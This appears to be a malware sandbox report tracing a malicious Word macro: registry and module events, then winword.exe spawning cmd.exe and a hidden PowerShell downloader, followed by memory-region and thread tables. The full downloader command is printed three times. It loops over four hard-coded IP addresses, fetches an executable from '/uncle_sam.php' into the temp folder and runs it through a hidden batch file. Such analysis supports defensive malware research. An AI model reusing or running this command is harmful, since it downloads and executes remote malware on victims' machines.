| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = MainWindow, data = 0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID, data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F} |
|
1 | |
| Window | Create | window_name = Form apply, wndproc_parameter = 0 |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER |
|
1 | |
| Window | Set Attribute | window_name = Form apply, index = 18446744073709551596, new_long = 262401 |
|
1 | |
| Window | Set Attribute | index = 0, new_long = 0 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-12-06 22:26:33 (Local Time) |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID, data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F} |
|
1 | |
| Window | Create | window_name = Form apply, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | window_name = Form apply, index = 18446744073709551596, new_long = 262401 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4230000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 617, address_out = 0x7fee439d48c |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4230000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 619, address_out = 0x7fee439d5a8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4230000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x7fee4334ee0 |
|
1 | |
| Process | Create | process_name = cmd /c powershell "'powershell ""function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\tmp6149.exe'';'""| out-file -encoding ascii -filepath %tmp%\tmp1971.bat; start-process '%tmp%\tmp1971.bat' -windowstyle hidden", os_pid = 0x994, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| System | Get Cursor | x_out = 1018, y_out = 358 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4230000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 617, address_out = 0x7fee439d48c |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4230000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 619, address_out = 0x7fee439d5a8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4230000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x7fee4334ee0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4230000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 617, address_out = 0x7fee439d48c |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4230000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 619, address_out = 0x7fee439d5a8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4230000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x7fee4334ee0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = PropertiesWindow, data = 4 24 180 720 1, size = 15, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = MainWindow, data = 0 0 0 0 1, size = 10, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = MdiMaximized, data = 0, size = 2, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
2 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = FolderView, data = 1, size = 2, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = Tool, size = 24, type = REG_BINARY |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CtlsShowSelected, data = 0, size = 2, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = DsnShowSelected, data = 0, size = 2, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 |
Process #2: cmd.exe
63
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c powershell "'powershell ""function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\tmp6149.exe'';'""| out-file -encoding ascii -filepath %tmp%\tmp1971.bat; start-process '%tmp%\tmp1971.bat' -windowstyle hidden" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:42, Reason: Child Process |
| Unmonitor | End Time: 00:00:54, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x994 |
| Parent PID | 0x8bc (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
998
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00830fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x01c3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c40000 | 0x01c40000 | 0x01f82fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f90000 | 0x0225efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49e60000 | 0x49eb8fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef9100000 | 0x7fef9107fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0x998
63
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:26:34 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 103303 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x49e60000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 | |
| Environment | Get Environment String | name = tmp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp |
|
4 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x9ac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #3: powershell.exe
469
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell "'powershell ""function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe'';'""| out-file -encoding ascii -filepath C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat; start-process 'C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat' -windowstyle hidden" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:43, Reason: Child Process |
| Unmonitor | End Time: 00:00:54, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9ac |
| Parent PID | 0x994 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9B0
0x
9B4
0x
9B8
0x
9BC
0x
9C0
0x
9C4
0x
9C8
0x
A54
0x
A58
0x
A70
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x001e0000 | 0x001e2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00390fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x0058efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00590fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x005a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x005d0000 | 0x005d3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x005e0000 | 0x005fffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00600fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x00930fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x01d3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01d40000 | 0x01d6ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x01d70000 | 0x01d73fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01dfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e00000 | 0x01e00000 | 0x01e00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001e10000 | 0x01e10000 | 0x01e12fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e20000 | 0x01e20000 | 0x01e20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001e30000 | 0x01e30000 | 0x01e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e40000 | 0x01e40000 | 0x01ebffff | Private Memory | rwx |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01ec0000 | 0x01f25fff | Memory Mapped File | r |
|
|
|
- |
| l_intl.nls | 0x01f30000 | 0x01f32fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x01f40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001f50000 | 0x01f50000 | 0x01fcffff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01fd0000 | 0x01fd4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001fe0000 | 0x01fe0000 | 0x01ffffff | Private Memory | - |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02000000 | 0x02007fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000002010000 | 0x02010000 | 0x02010fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002020000 | 0x02020000 | 0x02020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x02040000 | 0x02080fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x0210ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02110000 | 0x023defff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000023e0000 | 0x023e0000 | 0x027d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x028affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028b0000 | 0x028b0000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x029b0000 | 0x02a03fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002a10000 | 0x02a10000 | 0x02a8ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02b90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x1ac4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ac50000 | 0x1ac50000 | 0x1b31ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b340000 | 0x1b340000 | 0x1b3bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b420000 | 0x1b420000 | 0x1b49ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b4a0000 | 0x1b781fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll.mui | 0x1b790000 | 0x1b84ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000001b850000 | 0x1b850000 | 0x1b94ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x75470000 | 0x75538fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13f7f0000 | 0x13f866fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fedef00000 | 0x7fedf094fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fedf0a0000 | 0x7fedf20bfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fedf210000 | 0x7fedf8b4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fedf8c0000 | 0x7fedf9d7fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fedf9e0000 | 0x7fedfbf5fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fedfc00000 | 0x7fedfce4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fedfcf0000 | 0x7fedfd99fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fedfda0000 | 0x7fee00cdfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee00d0000 | 0x7fee0c2cfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee0c30000 | 0x7fee0ce1fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee0cf0000 | 0x7fee1712fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee1830000 | 0x7fee270bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee2710000 | 0x7fee30acfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fee6150000 | 0x7fee618dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fee6190000 | 0x7fee61c1fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee61d0000 | 0x7fee6268fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fef2fb0000 | 0x7fef3018fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef3020000 | 0x7fef308efff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef8e40000 | 0x7fef8e4bfff | Memory Mapped File | rwx |
|
|
|
- |
